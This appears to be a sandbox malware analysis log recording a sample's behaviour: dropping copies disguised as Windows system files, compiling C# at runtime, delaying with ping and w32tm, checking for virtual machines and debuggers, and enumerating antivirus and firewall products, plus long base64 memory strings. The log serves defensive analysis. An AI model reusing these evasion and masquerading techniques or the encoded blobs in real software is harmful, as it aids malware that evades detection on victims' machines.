Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe TID: 7256	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\ctfmon.exe TID: 7300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe TID: 8060	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\ctfmon.exe TID: 1156	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe TID: 1860	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe TID: 6424	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe TID: 2908	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Recovery\ctfmon.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\ctfmon.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\ctfmon.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\ctfmon.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\ctfmon.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\ctfmon.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\ctfmon.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: sppsvc.exe, 00000038.00000002.1998281735.000000001B890000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: sppsvc.exe, 00000038.00000002.1998281735.000000001B926000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: sppsvc.exe, 00000038.00000002.1982093338.0000000013151000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: VIyu4dC9CU.exe, 0000002F.00000002.1920621978.000000001AFB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: VIyu4dC9CU.exe, 0000002F.00000002.1942588896.000000001B8BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: sppsvc.exe, 00000038.00000002.1982093338.000000001309A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: w32tm.exe, 00000033.00000002.1832397414.00000202EE1E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: w32tm.exe, 00000022.00000002.1570229103.0000029E494E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: sppsvc.exe, 00000015.00000002.1485461795.000000001B764000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: VIyu4dC9CU.exe, 0000002F.00000002.1942588896.000000001B870000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=1
Source: VIyu4dC9CU.exe, 00000000.00000002.1301696190.000000001BFA3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@/
Source: ctfmon.exe, 00000013.00000002.1468436451.000000001B270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
Source: w32tm.exe, 00000019.00000002.1506990400.00000202A2F29000.00000004.00000020.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1546660217.000000001B7D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CS5lFm0nOf.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES4065.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES42D6.tmp" "c:\Windows\System32\CSCF1A5C7715E64605B8685523D04CDF88.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\VIyu4dC9CU.exe C:\Users\user\Desktop\VIyu4dC9CU.exe
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7z2CYqkT7L.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Queries volume information: C:\Users\user\Desktop\VIyu4dC9CU.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Queries volume information: C:\Recovery\ctfmon.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Queries volume information: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe VolumeInformation
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\ctfmon.exe	Queries volume information: C:\Recovery\ctfmon.exe VolumeInformation
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Queries volume information: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe VolumeInformation
Source: C:\Recovery\ctfmon.exe	Queries volume information: C:\Recovery\ctfmon.exe VolumeInformation
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Queries volume information: C:\Users\user\Desktop\VIyu4dC9CU.exe VolumeInformation
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Queries volume information: C:\Users\user\Desktop\VIyu4dC9CU.exe VolumeInformation
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: ctfmon.exe, 00000013.00000002.1468436451.000000001B2CC000.00000004.00000020.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1546660217.000000001B7F9000.00000004.00000020.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1546660217.000000001B832000.00000004.00000020.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1920621978.000000001AFE8000.00000004.00000020.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1998281735.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Recovery\ctfmon.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\ctfmon.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
